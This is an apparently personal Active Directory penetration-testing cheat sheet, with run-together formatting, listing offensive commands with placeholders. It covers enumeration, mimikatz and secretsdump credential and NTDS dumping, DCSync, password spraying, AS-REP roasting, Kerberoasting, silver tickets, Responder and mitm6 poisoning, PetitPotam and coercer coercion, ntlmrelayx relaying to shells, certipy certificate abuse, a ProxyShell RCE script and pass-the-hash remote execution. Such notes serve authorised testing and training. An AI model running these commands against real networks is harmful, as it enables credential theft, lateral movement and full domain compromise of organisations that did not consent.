AD mindmap - https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
python3 -m pipx install impacket
impacket as a library (like Petitpotam) will fail, since impacket isn’t installed as a pip librarypython3 -m venv pipenv, source pipenv/bin/activate, and pip install impacketEnum4Linux-ng
enum4linux-ng {IP}
-U for user enum, -o for OS info, -S for shares, -L for additional domain info (on DCs), -P for password policy info, -I for printer infoenum4linux-ng -u {username} -p {password} -w {domain} {target_IP}
-K {ticket_file} to auth using a Kerberos ticket (DNS must be set up)-H {NTHASH} to pass a hash--local-auth for local authenticationPingCastle
wget https://github.com/netwrix/pingcastle/releases/download/3.3.0.1/PingCastle_3.3.0.1.zipPingcastle.exe --healthcheck --server {domain} from the Windows sideNTLMRecon
ntlmrecon --input {IP_or_cidr_or_file} --outfile ntlmrecon.csvSMB
nxc smb {IP} -u '{domain}\{username}' -p {password}
--shares for share enumeration, --rid-brute 3000 or --users for user enum, --pass-pol for password policy--reg-sessions was a recent addition to query user sessions on a machine-M for modules, like exploits and such-X 'powershell -e ...'smbclient.py {ip} for an interactive SMB client
shares and select a share with use {share_name}tree to recursively list files in the sharepolicies/{guid}/machine/preferences/groups for a group policy password
gpp-decrypttr -d '\000' < input_file > output_file-k
smbclient.py {FQDN} -kmount -t cifs //{IP}/{share} /mnt/{created_dir}
-o username={username},password={password}LDAP
ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={TLD}"ldapsearch -D '{user}@{user_domain}' -w '{user_password}' -H ldap://{IP} -b "dc={target_domain},dc={tld}"ldapsearch -x -H ldap://{IP} -b "dc={domain},dc={tld}" "(objectClass=person)"
- More Hacktricks info| grep -iE "pass|pwd|secret|cred|auth|token|key"-b "dc={target_domain},dc={tld}" -s sub "*" | grep lockoutThresholdldapsearch -x -H ldap://{dc_ip} -D '{owned_username}@{domain}' -W -b "DC={domain},DC={tld}" "(sAMAccountName={target})"
userAccountControl: 66050
- If we have permissions over the user, we can reenable their account with ldapmodify by setting userAccountControl to 66048:ldapmodify -x -H ldap://{dc_ip} -D "{owned_username}@{domain}" -W << EOF
dn: CN={target_name_from_ldapsearch},CN=Users,DC={domain},DC={tld}
changetype: modify
replace: userAccountControl
userAccountControl: 66048
EOF
sudo ldapdomaindump ldaps://{IP} -u '{domain}\{username}' -p '{password}'* for the username or password, allowing us to log in with any user accountRPC
rpcclient -U '{domain}/{username}' {IP}
enumdomusers can get the domain users from within RPC, which we can then check again for preauthqueryuser {username} to get user properties (passwords could be in descriptions)
querydispinfoenum4linux-ng will check for this, among much elserpcclient -U "" {IP} -NExchange
ntlmrecon --input https://{exchange_endpoint}proxyshell_rce.py -u https://{exchange_endpoint} -e administrator@{domain} from an unauthed perspective
poc_aug3.py {IP} {username} {password} {command}
Capturing the system data with SharpHound:
Invoke-WebRequest {url} -Outfile {outfile}; Expand-Archive {outfile}Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory {dir} -OutputPrefix {filename_prefix}apt install bloodhound - installs latest BloodHound CE GUI
bloodhoundpipx install bloodhound-ce - installs latest bloodhound-ce-python
bloodhound-ce-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -c all --zip -op {out_prefix} -ns {dc_ns_ip}nxc ldap {dc} -u {username} -p {password} --bloodhound --collection All --dns-server {dns_server_ip}pipx install bloodhound
bloodhound-python -u {user} -p {password} (--hashes :{NT_HASH}) -d {domain} -c all --zip -op {out_prefix}Ensuring all data collection
-d and -dc flags, while specifying the domain of the user we own
bloodhound-ce-python -u {user}@{source_domain} -p {password} (--hashes :{NT_HASH}) -d {target_domain} -dc {target_domain_server_name} -c all --zip -op {out_prefix}Analyzing the data with BloodHound
sudo neo4j start
neo4j and install the suggested optionbloodhound
MATCH (m:Computer) RETURN mMATCH (m:User) RETURN mMATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p./cypher-shell -u neo4j -p {password} 'MATCH (c:Computer) WHERE toLower(c.name) ENDS WITH ".example.domain.tld" RETURN c.name' --format plain | tee hostnames.txtCached Credentials
privilege::debug gives us the SeDebugPrivilege to run below commandstoken::elevate to elevate to SYSTEM userlsadump::sam will dump NTLM hashes of local userssekurlsa::logonpasswords will look for clear-text passwords, dump NTLM hashes (including domain users), and dump Kerberos ticketssekurlsa::tickets will show tickets stored in memory
crypto::capi and crypto::cng can take care of thatPassword Spraying
net accounts will show authentication lockout information.\Spray-Passwords.ps1 -Pass Nexus123! -Adminsnxc smb {IP_with_smb} -u users.txt -p passwords.txt -d {domain} --continue-on-success
nxc smb {IP} -u {users.txt} -H {hashes.txt}.\kerbrute_windows_amd64.exe passwordspray -d {domain} .\usernames.txt "{password}"AS-REP Roasting
impacket-GetNPUsers on kali side
impacket-GetNPUsers -dc-ip {dc} -request -outputfile hashes.asreproast {domain}/{username} (alongside password)
impacket-GetNPUsers {domain}/ -no-pass -usersfile users.txt -dc-ip {IP} | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'Rubeus on Windows side
.\Rubeus.exe asreproast /nowrapimpacket-GetNPUsers -dc-ip {IP} {domain}/CVE-2022-33679.py {domain}/{user} {target_IP}Kerberoasting
impacket-GetUserSPNs if remote with creds
impacket-GetUserSPNs {domain}/{user}:{password} -dc-ip {IP} -requesttimedatectl set-ntp off and rdate -n {dc_ip} to syncRubeus again if local
.\Rubeus.exe kerberoast /outfile:hash.txthashcat -m 35300 {hash_file} {nt_hash_wordlist}Timeroasting
nxc smb {dc_ip} -M timeroastnet computer or using the “Assign this computer account as a pre-Windows 2000 computer” checkbox results in it having a password of the first 14 characters of the computer name, lowercase (cmon Microsoft wtf)
nmap -sL will get internal domain names if the domain has a reverse DNS zone (mapping IPs to domain names)nxc can figure out with a basic nxc smb {range} scanSilver Tickets
sekurlsa::logonpasswords on machine with established session with application (usually(?) current machine)whoami /user minus the last number (user RID)
- Alternatively, wmic useraccount where name='{account_name}'mimikatz
kerberos::golden /sid:{sid} /domain:{domain} /ptt /target:{server_name} /service:{service_protocol_like_http} /rc4:{NTLM_hash} /user:{any_domain_user}
ptt allows us to inject forged ticket into memory of target machineiwr -UseDefaultCredentials {protocol}://{server_name} to view a webserverPoisoning
sudo responder -I {network_interface} to respond to dns queries and host servers to capture the authentication sent
/etc/responder/Responder.conf, as we no longer want to be the server receiving the authmitm6 responds to these requests and can work with ntlmrelayx
-6 option with ntlmrelayx so it will listen for IPv6mitm6 -d {domain}
Coercing
nxc smb {IP} -M coerce_plus -o LISTENER={kali_IP}
-u {domain}\{user} and -p {password})EfsRpcOpenFileRaw to convince the DC to open a file at \\attacker_share\share, thus causing the DC to authenticate to ussmbserver to try and crack it, but this is pretty unlikely to work due to the randomized passwords
smbserver.py loot $(pwd) -smb2support will host a share on our IP called lootntlmrelayx or certipy-u {user} -p {password} -d {domain} can be usedsudo apt install coercercoercer coerce -u {domain_user} -p {password} -d {domain} -t {coercion_target_domain_IP} -l {listener_IP} --always-continue-l as the server we ownRelaying
ntlmrelayx
ntlmrelayx.py -t {protocol_like_ldaps}://{target_ip} -socks
smb can be used against servers that don’t have signing:
ntlmrelayx.py -tf {smb_no_signing_ips} -socks-socks will create a socks proxy to forward traffic along using the captured authentication
socks4 127.0.0.1 1080 to /etc/proxychains4.conf and then can run commands as though we had a powershell session as the user
secretsdump.py -no-pass where normally a password would need to be specified-c "{command}" will execute a command as the user, whereas --interactive can drop us into a shell on the respective protocol (SMB/LDAP/SQL)
nc to--remove-mic with LDAP to downgrade NTLM’s Message Integrity Check (aka to relay SMB info to an open LDAP port)-6 for listening for IPv6 with mitm6--keep-relaying will continue to relay to all targets even if we’ve already tried one hash on them
--add-computer {name} {password} will attempt to add a new computer via SMB/LDAP
--delegate-access will provide the target computer with delegation access to the the computer specifiedkrbrelayx.py
unconstrained delegation, we can use this to pivot
pretender -i "{network_interface}" --spoof "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA" --no-dhcp-dns --no-timestamps
coercer coerce -t BRAAVOS.ESSOS.LOCAL -l localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -u {domain_user} -p {password} -d {domain}ntlmrelayx.py -t BRAAVOS.ESSOS.LOCAL -smb2support
ntlmrelayx.py -t winrms://BRAAVOS.ESSOS.LOCAL -smb2support
pip install . inside a venvpython3 dnstool.py -u '{domain}\{user}' -p {password} {target_ip} -a add -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d {kali_IP}pip install exec-across-windowswmiexec.py -hashes :{hash} '{domain}/{user}@{ip}'psexec.py -hashes :{hash} '{domain}/{user}@{ip}' or smbexec.pyatexec.py -hashes :{hash} '{domain}/{user}@{ip}' "{command}"
requirements.txt to use cmd2<2.6xfreerdp3 /u:{user} /p:{password} /d:{domain} (/pth:{hash}) /v:{IP}
/drive:{created_drive_name},/home/kali/Downloads/${variable} | Out-GridViewevil-winrm -i {IP} -u '{domain}\{username}' -H {hash}
-r {domain} optional, used for kerberos--ssl for 5986 over HTTPSCertify.exe find /vulnerablecertipy find -u {user}@{domain} -p {password} (-hashes {nthash}) -dc-ip {dc_ip} -text
-vulnerable to cut the output down a bitEnabled True and Client Authentication Truepython PetitPotam.py {kali_IP} {coercable_DC_IP} to get a different DC to authenticate to usntlmrelayx.py -t http://{target_DC_IP}/certsrv/certfnsh.asp -smb2support --adcs --template '{vuln_template_name}' to relay the auth to the target
--template just specifies the template name we’re user from the vulnerable CAcertipy account -u "{user}@{domain}" -p {password} -dc-ip {dc_ip} -user '{user_to_check}' -upn '{upn_to_update_to}' updatecertipy shadow -u "{user}@{domain}" -p {password} -dc-ip {dc_ip} -account '{target_user}' autocertipy req -k -dc-ip {dc_ip} -target '{DC_fqdn}' -ca '{CA_name_from_certipy}' -template 'User'
getTGT.py with getTGT.py '{domain}/{user}:{password}' -dc-ip {dc_ip}certipy auth -pfx '{pfx_file}' -dc-ip '{dc_ip}' -domain '{domain}'
-ldap-shell for an LDAP shell instead
Client Authentication in its EKUs (Extended Key Usage), such as a Webserver templateRecon
sccmhunter.py find -u {username} -p {password} -d {domain} -dc-ip {dc_ip} -debug
nxc smb on the sccm server: nxc smb {sccm_ip} -u {username} -p {password} -d {domain} --sharespxethief.py 2 {sccm_ip} can also yield resultsExploitation
Abusing Domain Controller Synchronization
WriteDACL on the domain via a group, we can give ourselves the necessary permissionsmimikatz on domain-joined machine
lsadump::dcsync /user:{domain}\{user}impacket-secretsdump on kali
impacket-secretsdump -just-dc-user {target_domain_user} {domain}/{admin_username}:"{password}"@{DC_IP}impacket-secretsdump -hashes :{NTLM_hash} {domain}/{user}@{DC_IP}Dump NTDS from shell access
mkdir C:\Program\tempntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\ProgramData\temp' q q
impacket-secretsdump -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM LOCALUAC Fatigue